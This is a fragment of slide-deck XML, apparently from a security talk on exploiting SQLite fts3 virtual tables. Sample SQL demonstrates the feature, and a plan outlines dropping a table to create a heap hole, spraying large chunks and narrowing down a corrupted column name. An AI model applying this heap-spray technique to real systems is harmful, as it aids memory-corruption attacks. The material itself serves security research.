          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>500MB</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Rectangle 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212424" y="138544"/>
            <a:ext cx="11776375" cy="24568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Rectangle 2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Rectangle 24"/>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Rectangle 25"/>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Rectangle 26"/>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4472597"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5836165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 y="0"/>
            <a:ext cx="12192000" cy="3526971"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298580" y="335897"/>
            <a:ext cx="11579289" cy="3004461"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE VIRTUAL TABLE mail USING fts3(subject, body);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO mail(subject, body) VALUES('sample subject1', 'sample content'); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO mail(subject, body) VALUES('sample subject2', 'hello world'); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM mail WHERE body MATCH 'sample';</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="912941831"/>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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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7" name="Rectangle 76"/>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8" name="Rectangle 77"/>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Rectangle 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472597"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Rectangle 79"/>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1" name="Rectangle 80"/>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2" name="Rectangle 81"/>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3" name="Rectangle 82"/>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22871165"/>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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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Rectangle 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472597" y="686036"/>
            <a:ext cx="782508" cy="131619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="ltUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFC000"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:patt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Rectangle 83"/>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Rectangle 86"/>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Rectangle 87"/>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Rectangle 88"/>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Rectangle 89"/>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642264117"/>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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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4470391" y="688108"/>
            <a:ext cx="785091" cy="129215"/>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Rectangle 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4461157" y="4769608"/>
            <a:ext cx="1099124" cy="513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6" name="Rectangle 85"/>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Rectangle 86"/>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Rectangle 88"/>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Rectangle 89"/>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1" name="Rectangle 90"/>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Rectangle 91"/>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172989687"/>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AAAAAAAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZZZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>……………………….</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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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4470391" y="688108"/>
            <a:ext cx="785091" cy="129215"/>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Rectangle 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4461157" y="4769608"/>
            <a:ext cx="1099124" cy="513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6" name="Rectangle 85"/>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Rectangle 86"/>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Rectangle 88"/>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Rectangle 89"/>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1" name="Rectangle 90"/>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Rectangle 91"/>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 name="Curved Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="48" idx="1"/>
            <a:endCxn id="84" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4461157" y="752716"/>
            <a:ext cx="9234" cy="4273752"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6140546"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>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5253213"/>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a:t>table6’s column name AAAAAAAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZZZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>……………………….</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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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Rectangle 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472597" y="686036"/>
            <a:ext cx="782508" cy="131619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="ltUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFC000"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:patt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Rectangle 83"/>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Rectangle 86"/>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Rectangle 87"/>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Rectangle 88"/>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Rectangle 89"/>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500227429"/>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a:t>table6’s column name AAAAAAAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZZZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>……………………….</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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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030" name="Picture 6" descr="mario star iconì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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12715" y="1204726"/>
            <a:ext cx="502272" cy="502272"/>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p:cNvCxnSpPr>
            <a:stCxn id="1030" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4863851" y="812892"/>
            <a:ext cx="0" cy="391834"/>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84" name="Rectangle 83"/>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6" name="Rectangle 85"/>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Rectangle 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472597"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Rectangle 87"/>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Rectangle 88"/>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Rectangle 89"/>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1" name="Rectangle 90"/>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285677615"/>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72401" y="2801711"/>
            <a:ext cx="3460491" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stage 3 - 6</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400" y="1524681"/>
            <a:ext cx="6765960" cy="4027034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2944522412"/>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Plan</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Create a hole for the corrupted column name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(DROP the table)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Spray </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>with 0x1000000 chunks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0x10000000 ÷ 0x10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Do the same thing from Stage 1-2, to find the corrupted column</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Once the corrupted chunk is found, repeat step 1~3 and scale the chunk size down with a factor of 0x10 in each stage</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1108026988"/>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Why did I have to scale it down on each stage?</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attempts to spray 2GB worth of 0x1000 chunks proved to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>too slow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  →  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10 Minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Using a divide-and-conquer approach and scaling it down on each stage was way faster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Around </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 Minute</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2875473172"/>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7" name="TextBox 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468573" y="1693748"/>
            <a:ext cx="10261600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; DROP TABLE table6;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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Rectangle 83"/>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6" name="Rectangle 85"/>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Rectangle 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472597"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Rectangle 87"/>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Rectangle 88"/>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Rectangle 89"/>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1" name="Rectangle 90"/>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4065177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 y="0"/>
            <a:ext cx="12192000" cy="3526971"/>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298579" y="4012163"/>
            <a:ext cx="11579289" cy="2286099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3 Virtual Table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> with 2 columns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298580" y="335897"/>
            <a:ext cx="11579289" cy="3004461"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE VIRTUAL TABLE mail USING fts3(subject, body);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO mail(subject, body) VALUES('sample subject1', 'sample content'); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO mail(subject, body) VALUES('sample subject2', 'hello world'); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM mail WHERE body MATCH 'sample';</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="810347455"/>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0480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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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Rectangle 83"/>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6" name="Rectangle 85"/>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Rectangle 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472597"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Rectangle 87"/>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Rectangle 88"/>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Rectangle 89"/>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1" name="Rectangle 90"/>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1381173" y="166408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2036479" y="166253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91679" y="166253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Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346879" y="166253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3999010" y="166253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7" name="Rectangle 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654210"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8" name="Rectangle 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309718" y="166253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Rectangle 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961541"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Rectangle 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615617" y="166253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1" name="Rectangle 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270817"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2" name="Rectangle 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924328"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3" name="Rectangle 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578678"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Rectangle 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233954"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3" name="Rectangle 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9891517"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4" name="Rectangle 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546717"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5" name="Rectangle 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11204125"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6" name="Rectangle 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1381173" y="1148398"/>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7" name="Rectangle 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036479" y="1146847"/>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8" name="Rectangle 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2691679" y="1146847"/>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9" name="Rectangle 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346879" y="1146846"/>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0" name="Rectangle 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3999010" y="114684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1" name="Rectangle 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654210"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2" name="Rectangle 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309718" y="114684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3" name="Rectangle 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961541"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4" name="Rectangle 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615617" y="114684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5" name="Rectangle 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270817"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6" name="Rectangle 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924328"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7" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578678"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8" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233954"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9" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9891517"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0" name="Rectangle 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546717"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1" name="Rectangle 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11204125"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2" name="Rectangle 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380537" y="476960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3" name="Rectangle 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2035843" y="476805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4" name="Rectangle 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2691043" y="476805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5" name="Rectangle 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346243" y="476805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6" name="Rectangle 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3998374" y="476805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7" name="Rectangle 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4653574"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8" name="Rectangle 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
